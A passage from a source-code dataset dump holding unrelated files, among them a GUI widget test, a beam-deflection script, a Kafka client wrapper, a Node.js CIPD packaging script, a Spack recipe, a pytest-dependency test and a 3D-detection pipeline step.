ace8b39323ce54466593833d9c6eaec76e360820 | 909 | py | Python | tests/test_progressbar.py | Yardanico/pylibui-cffi | 10d90f08b6b1e43bf567ffcd22dbe976cb10e80e | [
"MIT"
] | 6 | 2017-10-16T03:23:05.000Z | 2020-11-10T06:24:04.000Z | tests/test_progressbar.py | TiberiumN/pylibui-cffi | 10d90f08b6b1e43bf567ffcd22dbe976cb10e80e | [
"MIT"
] | null | null | null | tests/test_progressbar.py | TiberiumN/pylibui-cffi | 10d90f08b6b1e43bf567ffcd22dbe976cb10e80e | [
"MIT"
] | 1 | 2018-09-07T06:14:27.000Z | 2018-09-07T06:14:27.000Z | """
Pylibui test suite.
"""
from pylibui.controls import ProgressBar
from tests.utils import WindowTestCase
class ProgressBarTest(WindowTestCase):
def setUp(self):
super().setUp()
self.progressbar = ProgressBar()
def test_value_initial_value(self):
"""Tests the progressbar's `value` initial value is zero."""
self.assertEqual(self.progressbar.value, 0)
def test_value_can_be_changed(self):
"""Tests the progressbar's `value` attribute can be changed."""
value = 30
self.progressbar.value = value
self.assertEqual(self.progressbar.value, value)
# TODO: should we check for variable type to avoid app crashes ?
# NOTE: weirdly enough, the sliders don't crash like this; this may
# be a bug in libui.
# with self.assertRaises(ValueError):
# self.progressbar.set_value('hello')
| 30.3 | 75 | 0.660066 |
ace8b5880f83efa2e6fd9910751cfa51c34d6209 | 4,630 | py | Python | Beam_Deformation.py | HeNeos/Mechanical | b64e9ea8610b4d8d8ef02d01d3ca7fea3ea7b857 | [
"MIT"
] | 1 | 2020-03-31T11:54:28.000Z | 2020-03-31T11:54:28.000Z | Beam_Deformation.py | HeNeos/Mechanical | b64e9ea8610b4d8d8ef02d01d3ca7fea3ea7b857 | [
"MIT"
] | null | null | null | Beam_Deformation.py | HeNeos/Mechanical | b64e9ea8610b4d8d8ef02d01d3ca7fea3ea7b857 | [
"MIT"
] | null | null | null | import math
import matplotlib.pyplot as plt
# Beam analysis script: shear force, bending moment, second moment of area,
# deflection (double integration of M/EI) and stress along a stepped shaft.
# All geometry is parameterised by the student number `n`; lengths in mm,
# forces in N, E in MPa.
n = 23
# Support reactions R1, R2 from static equilibrium (closed-form in n).
R2 = 5*(2*n*n + 1135*n + 110780)/(n+155)
R1 = 7340-60*n-R2
# Shear force diagram, sampled every millimetre along the beam.
v = []
v.append(0)
for x in range(1,310+2*n+1):
    aux = R1
    if x>10:
        aux = aux-(12-n)*(x-10)
    if x>130+2*n:
        aux = aux-(5000+10*n)
    if x>80:
        aux = aux + (12-n)*(x-80)
    if x>260+2*n:
        aux = aux+(50)*(x-(260+2*n)) + (5/12)*(x-(260+2*n))*(x-(260+2*n))
    if x>200+2*n:
        aux = aux-(5/12)*(x - (200+2*n))*(x - (200+2*n))
    if x>=310+2*n:
        aux = aux + R2
    v.append(aux)
plt.figure(figsize=(9,4))
plt.xlabel('Longitud (mm)')
plt.ylabel('Fuerza cortante (N)')
plt.grid()
plt.plot(v,'-b')
plt.savefig('Fuerzacortante.pdf')
# Bending moment diagram (same load cases, integrated once).
m = []
for x in range(0,310+2*n+1):
    aux = R1*x
    if x>10:
        aux = aux-(12-n)*(x-10)*(x-10)/2
    if x>130+2*n:
        aux = aux-(5000+10*n)*(x-(130+2*n))
    if x>80:
        aux = aux + (12-n)*(x-80)*(x-80)/2
    if x>260+2*n:
        aux = aux+(25)*(x-(260+2*n))*(x-(260+2*n)) + (5/36)*(x-(260+2*n))*(x-(260+2*n))*(x-(260+2*n))
    if x > 130+2*n:
        aux = aux+(60000+200*n)
    if x>200+2*n:
        aux = aux-(5/36)*(x - (200+2*n))*(x - (200+2*n))*(x - (200+2*n))
    if x>=310+2*n:
        aux = aux + R2*(x-(310+2*n))
    m.append(aux)
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Momento flector (N-mm)')
plt.plot(m,'r')
plt.savefig('momento.pdf')
# Second moment of area I = pi*d^4/64 for each shaft segment; the middle
# segment is a linear taper from d=50 to d=70.
I = []
for i in range(0,310+2*n+1):
    if i<10:
        I.append((math.pi*(40)**4)/64)
        continue
    if i<80:
        I.append((math.pi*(50)**4)/64)
        continue
    if i<200+2*n:
        I.append((math.pi*(((50+((i-80)*20/(120+2*n))))**4)/64))
        continue
    if i<260+2*n:
        I.append((math.pi*(70)**4)/64)
        continue
    if i<300+2*n:
        I.append((math.pi*(60)**4)/64)
        continue
    I.append((math.pi*(55)**4)/64)
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Momento de inercia (mm$^4$)')
plt.plot(I,'-m')
plt.savefig('momentoi.pdf')
# Curvature M/(E*I); E = 210 GPa = 2.1e5 MPa (steel).
E = 2.1*10**5
MEI = []
for i in range(0,310+2*n+1):
    MEI.append(m[i]/(E*I[i]))
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('M/EI (mm)')
plt.plot(MEI,'-b')
plt.savefig('mei.pdf')
# First numerical integration of M/I (trapezoid-free running sum, step 1 mm).
mi = []
mi.append(0)
for i in range(1,310+2*n+1):
    mi.append(m[i]/I[i] + mi[i-1])
plt.figure(figsize=(9,4))
plt.xlabel('Longitud (mm)')
plt.ylabel('$\int M/I$ (N/mm$^{2}$)')
plt.grid()
plt.plot(mi)
plt.savefig('mintegr.pdf')
# Second integration -> elastic curve (up to integration constants).
mii = []
mii.append(0)
for i in range(1,310+2*n+1):
    mii.append(mi[i]+mii[i-1])
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('$ \iint M/I\,\mathrm{d}x $ (MPa-mm)')
plt.plot(mii)
plt.savefig('m2i.pdf')
# Boundary condition: zero deflection at both supports fixes the linear term.
const = -mii[310+2*n]/(310+2*n)
for i in range(0,310+2*n+1):
    mii[i] = (mii[i]+const*i)/E
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Deformada (mm)')
plt.plot(mii,'-k')
plt.savefig('def.pdf')
# Tangent lines for the slope/angle construction; the hard-coded slopes and
# offsets were presumably read off a previous run — TODO confirm.
rect1 = []
rect2 = []
for i in range(0,40):
    rect1.append(-4.0824*10**(-4)*(i) - 2.4*10**-8)
    rect2.append(3.12*10**(-4)*(i+357-20) - 1.1110683*10**(-1))
indx = []
for i in range(357-20,357+20):
    indx.append(i)
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Deformada (mm)')
plt.plot(mii,'-k')
plt.plot(rect1)
plt.plot(indx,rect2)
plt.savefig('ang.pdf')
# Maximum deflection (flecha) and its position.
flechamax = 0
posflecha = 0
for i in range(0,310+2*n+1):
    flechamax = max(flechamax,abs(mii[i]))
for i in range(0,310+2*n+1):
    if(abs(mii[i]) == flechamax):
        posflecha = i
# NOTE(review): despite the name, each entry is pi*(d/2) — pi*radius — not a
# cross-section area pi*r^2; the stress formulas below divide by it as-is,
# so verify the intended quantity.
area = []
for i in range(0,310+2*n+1):
    if i<10:
        area.append(math.pi*(40/2))
        continue
    if i<80:
        area.append((math.pi*(50/2)))
        continue
    if i<200+2*n:
        area.append((math.pi*(((50+((i-80)*20/(120+2*n)))/2))))
        continue
    if i<260+2*n:
        area.append((math.pi*(70/2)))
        continue
    if i<300+2*n:
        area.append(math.pi*(60/2))
        continue
    area.append((math.pi*(55/2)))
# Maximum bending stress sigma = M*c/I, with c = sqrt(area/pi) per the
# (questionable) `area` definition above.
esfm = 0
poses = 0
for i in range(0,310+2*n+1):
    if abs(math.sqrt(area[i]/math.pi)*m[i]/I[i]) > esfm:
        esfm = abs(math.sqrt(area[i]/math.pi)*m[i]/I[i])
        poses = i
print(esfm, poses)
#MPa
# Combined stress: bending plus direct shear V/area, combined in quadrature.
esfm = 0
poses = 0
gresf = []
for i in range(0,310+2*n+1):
    esff = abs(math.sqrt(area[i]/math.pi)*m[i]/I[i])
    gresf.append(math.sqrt(esff**2 + (v[i]/area[i])**2))
    if math.sqrt(esff**2 + (v[i]/area[i])**2) > esfm:
        esfm = math.sqrt(esff**2 + (v[i]/area[i])**2)
        poses = i
print(esfm, poses)
plt.figure(figsize=(10,5))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Esfuerzo (MPa)')
plt.plot(gresf)
plt.savefig('esfuerzo.pdf')
| 22.920792 | 101 | 0.539957 |
ace8b5bf7c7a31f660111964509506e60980b700 | 3,680 | py | Python | py_kafk/old/kafka-python.py | liuansen/python-utils-class | 7f5371ab09b433f555f732dd35350581701e16f0 | [
"Apache-2.0"
] | 3 | 2019-05-09T08:15:29.000Z | 2021-10-12T06:24:49.000Z | py_kafk/old/kafka-python.py | liuansen/python-utils-class | 7f5371ab09b433f555f732dd35350581701e16f0 | [
"Apache-2.0"
] | 3 | 2020-03-24T06:22:02.000Z | 2021-06-10T21:28:35.000Z | py_kafk/old/kafka-python.py | liuansen/python-utils-class | 7f5371ab09b433f555f732dd35350581701e16f0 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# author๏ผAnson
# @Time : 2020/9/21 14:36
# @File : encrypt_kafka.py
from __future__ import unicode_literals
from kafka import KafkaProducer
from kafka import KafkaConsumer
from kafka.errors import KafkaError
import json
class MyEncoder(json.JSONEncoder):
    """JSON encoder that renders ``bytes`` values as UTF-8 text."""

    def default(self, obj):
        # json cannot serialise raw bytes; decode them before delegating
        # (the base implementation raises TypeError for anything else).
        if isinstance(obj, bytes):
            return obj.decode('utf-8')
        return super().default(obj)
class Kafka_producer():
    '''
    Thin wrapper around KafkaProducer that publishes JSON payloads over SSL.
    '''

    def __init__(self, kafkahost, kafkaport, kafkatopic):
        ssl_certfile = "../conf/certificate.pem"
        ssl_cafile = "../conf/ca-root.pem"
        self.kafkaHost = kafkahost
        self.kafkaPort = kafkaport
        self.kafkatopic = kafkatopic
        self.producer = KafkaProducer(
            # BUG FIX: bootstrap_servers was hard-coded to "localhost:9092",
            # silently ignoring the kafkahost/kafkaport constructor arguments.
            bootstrap_servers=f"{kafkahost}:{kafkaport}",
            value_serializer=lambda v: json.dumps(v, cls=MyEncoder, indent=4).encode('utf-8'),
            retries=0,
            api_version=(2, 3),
            request_timeout_ms=200,
            ssl_check_hostname=False,
            ssl_certfile=ssl_certfile,
            security_protocol="SSL",
            ssl_cafile=ssl_cafile
        )

    def sendjsondata(self, params):
        """Serialise *params* to JSON and publish it to the configured topic,
        flushing so the message leaves before returning. Errors are printed,
        not raised (best-effort send, kept from the original)."""
        try:
            parmas_message = json.dumps(params)
            print(parmas_message)
            producer = self.producer
            producer.send(self.kafkatopic, parmas_message.encode('utf-8'))
            producer.flush()
        except KafkaError as e:
            print(e)
class Kafka_consumer():
    '''
    Thin wrapper around KafkaConsumer that prints each JSON-decoded message.
    '''

    def __init__(self, kafkahost, kafkaport, kafkatopic, groupid):
        ssl_certfile = "../conf/certificate.pem"
        ssl_cafile = "../conf/ca-root.pem"
        self.kafkaHost = kafkahost
        self.kafkaPort = kafkaport
        self.kafkatopic = kafkatopic
        self.groupid = groupid
        self.consumer = KafkaConsumer(
            # BUG FIX: group_id and bootstrap_servers were hard-coded
            # ('consumer_group_police_seemmo' / '127.0.0.1:9092'), silently
            # ignoring the constructor arguments.
            group_id=groupid,
            bootstrap_servers=f'{kafkahost}:{kafkaport}',
            api_version=(2, 3),
            enable_auto_commit=False,
            auto_commit_interval_ms=5000,
            # SSL options kept disabled exactly as in the original:
            # ssl_check_hostname=False,
            # ssl_certfile=ssl_certfile,
            # security_protocol="SSL",
            # ssl_cafile=ssl_cafile
        )

    def consume_data(self):
        """Subscribe to the configured topic and print each decoded message
        until interrupted (Ctrl-C is caught and printed)."""
        # BUG FIX: removed a leftover debug print('123') and the hard-coded
        # 'test' topic; consume from the topic given to the constructor.
        self.consumer.subscribe([self.kafkatopic])
        try:
            for message in self.consumer:
                print(json.loads(message.value))
        except KeyboardInterrupt as e:
            print(e)
if __name__ == '__main__':
    # Ad-hoc smoke test for the consumer; producer / consumer-class demos are
    # kept below, commented out, as in the original.
    # # producer smoke test
    # producer = Kafka_producer("127.0.0.1", 9092, "test")
    # for i in range(10):
    #     params = '{abetst}:{null}---' + str(i)
    #     producer.sendjsondata(params)
    # # consumer-class smoke test
    # consumer = Kafka_consumer("127.0.0.1", 9092, "test", "asklfdjsdfasdfg")
    # consumer.consume_data()
    consumer = KafkaConsumer(bootstrap_servers=['127.0.0.1:9092'], group_id='wm_group',
                             auto_offset_reset='latest', enable_auto_commit=False)
    # FIX: the trailing comment on this line had been split across two source
    # lines by a bad paste, leaving a bare non-ASCII identifier that raised
    # NameError at runtime.
    consumer.subscribe(['test'])  # subscribe to the topic to consume
    for message in consumer:
        print(message.value)
ace8b64d866b2494673585b178b9b9dfb1fbd84f | 4,011 | py | Python | bootstrap/cipd/doc/infra/nodejs/nodejs/build.py | xinghun61/infra | b5d4783f99461438ca9e6a477535617fadab6ba3 | [
"BSD-3-Clause"
] | 2 | 2021-04-13T21:22:18.000Z | 2021-09-07T02:11:57.000Z | bootstrap/cipd/doc/infra/nodejs/nodejs/build.py | asdfghjjklllllaaa/infra | 8f63af54e46194cd29291813f2790ff6e986804d | [
"BSD-3-Clause"
] | 21 | 2020-09-06T02:41:05.000Z | 2022-03-02T04:40:01.000Z | bootstrap/cipd/doc/infra/nodejs/nodejs/build.py | xinghun61/infra | b5d4783f99461438ca9e6a477535617fadab6ba3 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This is a simple standalone Python script to construct a CIPD package for
Node.js.
It expects CIPD to be in the path, and uses constants to determine which
sources to use to build the CIPD packages.
"""
import argparse
import collections
import contextlib
import hashlib
import io
import logging
import os
import shutil
import subprocess
import sys
import tarfile
import tempfile
import urllib.request
# The common application logger.
LOGGER = logging.getLogger('cipd-nodejs-build')
# Base package name. Platform names will be appended to this for each platform.
CIPD_PACKAGE_BASE = 'infra/nodejs/nodejs'
NodeParams = collections.namedtuple('NodeParams', ('version',))
NodePackage = collections.namedtuple('NodePackage', ('filename', 'sha256'))
# Node parameter dictionary.
NODE_PARAMS = NodeParams(
# The Node.js version.
version='10.15.3',
)
# URL template for a Node.js package.
NODE_URL_TEMPLATE = 'https://nodejs.org/dist/v%(version)s/%(filename)s'
# A map of platform to (URL, SHA256) for each supported package.
PLATFORMS = collections.OrderedDict({
'linux-amd64': NodePackage(
filename = 'node-v%(version)s-linux-x64.tar.xz',
sha256='faddbe418064baf2226c2fcbd038c3ef4ae6f936eb952a1138c7ff8cfe862438',
),
'mac-amd64': NodePackage(
filename = 'node-v%(version)s-darwin-x64.tar.gz',
sha256='7a5eaa1f69614375a695ccb62017248e5dcc15b0b8edffa7db5b52997cf992ba',
),
})
@contextlib.contextmanager
def tempdir():
  """Yields a fresh temporary directory under CWD; always removed on exit."""
  path = tempfile.mkdtemp(prefix='tmpCIPDNode', dir=os.getcwd())
  try:
    yield path
  finally:
    shutil.rmtree(path)
def _upload_cipd_package_from(name, root):
  """Runs `cipd create` to package the tree at *root* and upload it as *name*.

  Tags the package with the Node.js version and moves the 'latest' ref.
  Raises subprocess.CalledProcessError if the cipd invocation fails.
  """
  args = [
      'cipd', 'create',
      '-name', name,
      '-in', root,
      '-install-mode', 'copy',
      '-ref', 'latest',
      '-tag', 'node_version:%s' % (NODE_PARAMS.version,),
  ]
  LOGGER.debug('Running command: %s', args)
  subprocess.check_call(args)
def _strip_extension(v):
for ext in ('.tar.gz', '.tar.xz'):
if v.endswith(ext):
return v[:-len(ext)]
return v
def _build_cipd_package(pkg_name, package):
  """Downloads, verifies, unpacks, and uploads one Node.js CIPD package.

  Args:
    pkg_name: Full CIPD package name for this platform.
    package: A NodePackage with the archive filename template and its SHA256.

  Raises:
    ValueError: If the downloaded archive fails its SHA256 check, or does not
        contain the expected top-level directory.
  """
  params = NODE_PARAMS._asdict()
  params.update({
      'filename': package.filename % params,
  })
  url = NODE_URL_TEMPLATE % params

  LOGGER.info('Downloading package for [%s] from: %s', pkg_name, url)
  with urllib.request.urlopen(url) as conn:
    data = conn.read()

  # Verify the archive against its pinned SHA256 before trusting its contents.
  h = hashlib.sha256(data)
  if h.hexdigest().lower() != package.sha256.lower():
    LOGGER.error('SHA256 of package [%s] (%s) does not match expected (%s)',
                 url, h.hexdigest(), package.sha256)
    raise ValueError('SHA256 mismatch')
  basedir = _strip_extension(url.split('/')[-1])

  # Unpack the file.
  bio = io.BytesIO(data)
  tf = tarfile.open(fileobj=bio, mode='r:*')
  try:
    # Our 'basedir' must be a member. BUG FIX: TarFile.getmember() raises
    # KeyError for a missing member rather than returning a falsy value, so
    # the original `if not tf.getmember(...)` test could never fire; catch
    # the KeyError to reach the intended error path.
    try:
      tf.getmember(basedir)
    except KeyError:
      LOGGER.error('Package TAR does not include basedir (%s)', basedir)
      raise ValueError('Unexpected TAR contents')

    # Extract whitelisted files into a temporary directory, and ship that off
    # to CIPD.
    with tempdir() as tdir:
      basedir_whitelist = ['%s/%s/' % (basedir, dname)
                           for dname in ('bin', 'lib', 'include', 'share')]
      for member in tf.getmembers():
        for w in basedir_whitelist:
          if member.name.startswith(w):
            break
        else:
          # Not whitelisted.
          continue
        tf.extract(member, tdir)

      # Package up our basedir.
      _upload_cipd_package_from(pkg_name, os.path.join(tdir, basedir))
  finally:
    tf.close()
def main():
  """Builds and uploads a CIPD package for every supported platform."""
  for platform, package in PLATFORMS.items():
    _build_cipd_package('/'.join((CIPD_PACKAGE_BASE, platform)), package)
  return 0
if __name__ == '__main__':
  # Debug-level logging surfaces the download URL and cipd command lines.
  logging.basicConfig(level=logging.DEBUG)
  sys.exit(main())
| 27.285714 | 80 | 0.681875 |
ace8b6b4ab26e5c787080dc0c7e7088b84b4d135 | 1,341 | py | Python | var/spack/repos/builtin/packages/unigen/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2,360 | 2017-11-06T08:47:01.000Z | 2022-03-31T14:45:33.000Z | var/spack/repos/builtin/packages/unigen/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 13,838 | 2017-11-04T07:49:45.000Z | 2022-03-31T23:38:39.000Z | var/spack/repos/builtin/packages/unigen/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1,793 | 2017-11-04T07:45:50.000Z | 2022-03-30T14:31:53.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Unigen(MakefilePackage):
    """The United Generators project was launched by the Virtual Institute 146
    VI-SIM in September 2005 following a proposal of Herbert Strobele.
    The goal was to facilitate comparison between various models (see below)
    and/or various experiments (HADES, FOPI, CERES, NA49, CBM). The package
    at present allows to convert output of various event generators to a
    generic root format."""

    homepage = "https://www.gsi.de/work/wissenschaftliche_netzwerke/helmholtz_virtuelle_institute/unigen.htm"
    url = "https://github.com/FairRootGroup/UniGen/archive/v2.3.tar.gz"

    tags = ['hep']

    version('2.3', sha256='8783bcabbdf8c50dab6e93153cff9cfb267a9a9e61aef51bf1e17679ba42a717')

    # Repo-local patch applied against the unpacked source root (strip level 0).
    patch('unigen-2.3.patch', level=0)

    depends_on('root', type=('build', 'link'))

    def build(self, spec, prefix):
        # The Makefile expects TOPDIR to point at the build tree and needs an
        # existing lib/ output directory before 'make all'.
        mkdirp(join_path(self.build_directory, 'lib'))
        make('TOPDIR=' + self.build_directory, 'all')

    def install(self, spec, prefix):
        make('DESTDIR=' + prefix, 'TOPDIR=' + self.build_directory, 'install')
| 39.441176 | 110 | 0.701715 |
ace8b729f4f95f198d8dfaee97611415736dcf32 | 1,892 | py | Python | tests/test_03_param.py | celeraone/pytest-dependency | 8c69383cfb8df47467071ee10af83b60e67616c0 | [
"Apache-2.0"
] | 1 | 2018-07-17T13:35:40.000Z | 2018-07-17T13:35:40.000Z | tests/test_03_param.py | celeraone/pytest-dependency | 8c69383cfb8df47467071ee10af83b60e67616c0 | [
"Apache-2.0"
] | null | null | null | tests/test_03_param.py | celeraone/pytest-dependency | 8c69383cfb8df47467071ee10af83b60e67616c0 | [
"Apache-2.0"
] | 1 | 2018-12-01T16:52:17.000Z | 2018-12-01T16:52:17.000Z | """A scenario featuring parametrized tests.
"""
import pytest
def test_multiple(ctestdir):
    """Parametrized dependency scenario.

    b-cases depend on pairs of a-cases and c-cases on triples of b-cases; the
    single failing a-case (1,1) cascades into skips downstream.
    """
    # NOTE: the embedded file uses the legacy `pytest.mark.X(...)(param)` mark
    # application style; its content must stay exactly as written.
    ctestdir.makepyfile("""
        import pytest
        @pytest.mark.parametrize("x,y", [
            pytest.mark.dependency(name="a1")((0,0)),
            pytest.mark.dependency(name="a2")((0,1)),
            pytest.mark.dependency(name="a3")((1,0)),
            pytest.mark.dependency(name="a4")((1,1))
        ])
        def test_a(x,y):
            assert x==0 or y==0
        @pytest.mark.parametrize("u,v", [
            pytest.mark.dependency(name="b1", depends=["a1", "a2"])((1,2)),
            pytest.mark.dependency(name="b2", depends=["a1", "a3"])((1,3)),
            pytest.mark.dependency(name="b3", depends=["a1", "a4"])((1,4)),
            pytest.mark.dependency(name="b4", depends=["a2", "a3"])((2,3)),
            pytest.mark.dependency(name="b5", depends=["a2", "a4"])((2,4)),
            pytest.mark.dependency(name="b6", depends=["a3", "a4"])((3,4))
        ])
        def test_b(u,v):
            pass
        @pytest.mark.parametrize("w", [
            pytest.mark.dependency(name="c1", depends=["b1", "b3", "b5"])(1),
            pytest.mark.dependency(name="c2", depends=["b1", "b3", "b6"])(2),
            pytest.mark.dependency(name="c3", depends=["b1", "b2", "b4"])(3)
        ])
        def test_c(w):
            pass
    """)
    result = ctestdir.runpytest("--verbose")
    # 4 a + 6 b + 3 c = 13 cases: a4 fails, its dependents are skipped.
    result.assert_outcomes(passed=7, skipped=5, failed=1)
    result.stdout.fnmatch_lines("""
        *::test_a?0-0? PASSED
        *::test_a?0-1? PASSED
        *::test_a?1-0? PASSED
        *::test_a?1-1? FAILED
        *::test_b?1-2? PASSED
        *::test_b?1-3? PASSED
        *::test_b?1-4? SKIPPED
        *::test_b?2-3? PASSED
        *::test_b?2-4? SKIPPED
        *::test_b?3-4? SKIPPED
        *::test_c?1? SKIPPED
        *::test_c?2? SKIPPED
        *::test_c?3? PASSED
    """)
ace8b7b0f9323a5917d3798f499555a95e2d9e23 | 168 | py | Python | fl-dungeon/adventurelib/tests/localization.py | CenturionFox/fl-dungeon | f80461335b682418903b7de9333e7842057772f9 | [
"MIT"
] | null | null | null | fl-dungeon/adventurelib/tests/localization.py | CenturionFox/fl-dungeon | f80461335b682418903b7de9333e7842057772f9 | [
"MIT"
] | null | null | null | fl-dungeon/adventurelib/tests/localization.py | CenturionFox/fl-dungeon | f80461335b682418903b7de9333e7842057772f9 | [
"MIT"
] | null | null | null | import unittest
class Test_localization(unittest.TestCase):
def test_A(self):
self.fail("Not implemented")
if __name__ == '__main__':
unittest.main()
| 18.666667 | 43 | 0.696429 |
ace8b7bd8f6fd6cace6866893960703d63443a71 | 652 | py | Python | app/api/patch/patch.py | duckbytes/bloodbike-api | c6867160dd899a90aa7315125ac04e4cb71e7b79 | [
"Apache-2.0"
] | 2 | 2021-06-27T09:01:26.000Z | 2021-07-04T22:07:42.000Z | app/api/patch/patch.py | duckbytes/bloodbike-api | c6867160dd899a90aa7315125ac04e4cb71e7b79 | [
"Apache-2.0"
] | 1 | 2021-07-20T21:10:19.000Z | 2021-07-20T21:10:19.000Z | app/api/patch/patch.py | duckbytes/bloodbike-api | c6867160dd899a90aa7315125ac04e4cb71e7b79 | [
"Apache-2.0"
] | null | null | null | import flask_praetorian
from flask import jsonify
from app.api.functions.errors import internal_error
from app.api.functions.utilities import get_all_objects
from flask_restx import Resource
from app import root_ns
from app import models
from app import schemas
patches_schema = schemas.PatchSchema(many=True)
PATCH = models.Objects.PATCH
@root_ns.route('/patches', endpoint='patches_list')
class Patches(Resource):
    @flask_praetorian.auth_required
    def get(self):
        """Returns all patch records serialized as JSON (auth required)."""
        try:
            items = get_all_objects(PATCH)
        except Exception as e:
            # Delegate failures to the shared handler so the API responds
            # uniformly instead of surfacing an unhandled exception.
            return internal_error(e)
        return jsonify(patches_schema.dump(items))
| 25.076923 | 55 | 0.751534 |
ace8b7c053b65e9ac493ebbbc90d4b3b6224639f | 415 | py | Python | webapp/main/migrations/0013_location_description.py | joepetrini/bike-counter | e22190d7225ee54e7327efe43861f85c49c0bbd7 | [
"MIT"
] | 5 | 2015-01-09T00:54:43.000Z | 2021-06-16T20:46:45.000Z | webapp/main/migrations/0013_location_description.py | joepetrini/bike-counter | e22190d7225ee54e7327efe43861f85c49c0bbd7 | [
"MIT"
] | 4 | 2015-06-30T12:04:22.000Z | 2017-02-08T00:11:19.000Z | webapp/main/migrations/0013_location_description.py | joepetrini/bike-counter | e22190d7225ee54e7327efe43861f85c49c0bbd7 | [
"MIT"
] | 2 | 2015-01-07T02:46:27.000Z | 2015-07-01T19:43:03.000Z | # encoding: utf8
from django.db import models, migrations
class Migration(migrations.Migration):
    # Adds an optional free-text `description` column to the Location model.

    dependencies = [
        ('main', '0012_metric_system_name'),
    ]

    operations = [
        migrations.AddField(
            model_name='location',
            name='description',
            # null=True + blank=True: optional at both DB and form level.
            field=models.CharField(max_length=250, null=True, blank=True),
            preserve_default=True,
        ),
    ]
| 21.842105 | 74 | 0.6 |
ace8b7cb4fc63a9556836f5a255acbed88954818 | 2,885 | py | Python | tools/det3d/datasets/pipelines/formating.py | yukke42/CenterPointTensorRT | c06ec5da881b4f44f22f9e4b67bebbd35b7d1ed3 | [
"MIT"
] | 68 | 2021-12-06T06:30:13.000Z | 2022-03-30T08:37:19.000Z | tools/det3d/datasets/pipelines/formating.py | yukke42/CenterPointTensorRT | c06ec5da881b4f44f22f9e4b67bebbd35b7d1ed3 | [
"MIT"
] | 8 | 2022-01-07T09:41:02.000Z | 2022-03-22T12:33:07.000Z | tools/det3d/datasets/pipelines/formating.py | yukke42/CenterPointTensorRT | c06ec5da881b4f44f22f9e4b67bebbd35b7d1ed3 | [
"MIT"
] | 22 | 2021-12-15T02:15:27.000Z | 2022-03-30T08:37:22.000Z | from det3d import torchie
import numpy as np
import torch
from ..registry import PIPELINES
class DataBundle(object):
    """Trivial wrapper holding a single data payload."""

    def __init__(self, data):
        # Stored verbatim; no copying or validation.
        self.data = data
@PIPELINES.register_module
class Reformat(object):
    """Packs points/voxels (and, optionally, flipped copies) into bundles."""

    def __init__(self, **kwargs):
        # When enabled, __call__ additionally emits y-flip, x-flip and
        # double-flip variants of the sample (test-time augmentation);
        # only used in "val" mode below.
        double_flip = kwargs.get('double_flip', False)
        self.double_flip = double_flip

    def __call__(self, res, info):
        meta = res["metadata"]
        points = res["lidar"]["points"]
        voxels = res["lidar"]["voxels"]

        data_bundle = dict(
            metadata=meta,
            points=points,
            voxels=voxels["voxels"],
            shape=voxels["shape"],
            num_points=voxels["num_points"],
            num_voxels=voxels["num_voxels"],
            coordinates=voxels["coordinates"])

        if res["mode"] == "train":
            # Training samples additionally carry the target annotations.
            data_bundle.update(res["lidar"]["targets"])
        elif res["mode"] == "val":
            data_bundle.update(dict(metadata=meta, ))

            if self.double_flip:
                # y axis
                yflip_points = res["lidar"]["yflip_points"]
                yflip_voxels = res["lidar"]["yflip_voxels"]
                yflip_data_bundle = dict(
                    metadata=meta,
                    points=yflip_points,
                    voxels=yflip_voxels["voxels"],
                    shape=yflip_voxels["shape"],
                    num_points=yflip_voxels["num_points"],
                    num_voxels=yflip_voxels["num_voxels"],
                    coordinates=yflip_voxels["coordinates"],)

                # x axis
                xflip_points = res["lidar"]["xflip_points"]
                xflip_voxels = res["lidar"]["xflip_voxels"]
                xflip_data_bundle = dict(
                    metadata=meta,
                    points=xflip_points,
                    voxels=xflip_voxels["voxels"],
                    shape=xflip_voxels["shape"],
                    num_points=xflip_voxels["num_points"],
                    num_voxels=xflip_voxels["num_voxels"],
                    coordinates=xflip_voxels["coordinates"],)
                # double axis flip
                double_flip_points = res["lidar"]["double_flip_points"]
                double_flip_voxels = res["lidar"]["double_flip_voxels"]
                double_flip_data_bundle = dict(
                    metadata=meta,
                    points=double_flip_points,
                    voxels=double_flip_voxels["voxels"],
                    shape=double_flip_voxels["shape"],
                    num_points=double_flip_voxels["num_points"],
                    num_voxels=double_flip_voxels["num_voxels"],
                    coordinates=double_flip_voxels["coordinates"],
                )

                # Order matters downstream: identity, y-flip, x-flip, both.
                return [data_bundle, yflip_data_bundle, xflip_data_bundle, double_flip_data_bundle], info

        return data_bundle, info
| 35.182927 | 105 | 0.540381 |
ace8b8cee6c4b5b15dfbb5c9ba078d24d11a588e | 35,059 | py | Python | grr/core/grr_response_core/lib/rdfvalue.py | dekoder/grr | 27ba38dc0f5ad4f3e0cdbfb146a0a789e3b0d27b | [
"Apache-2.0"
] | 3 | 2018-09-30T01:31:29.000Z | 2019-04-22T11:44:54.000Z | grr/core/grr_response_core/lib/rdfvalue.py | tomchop/grr | 27ba38dc0f5ad4f3e0cdbfb146a0a789e3b0d27b | [
"Apache-2.0"
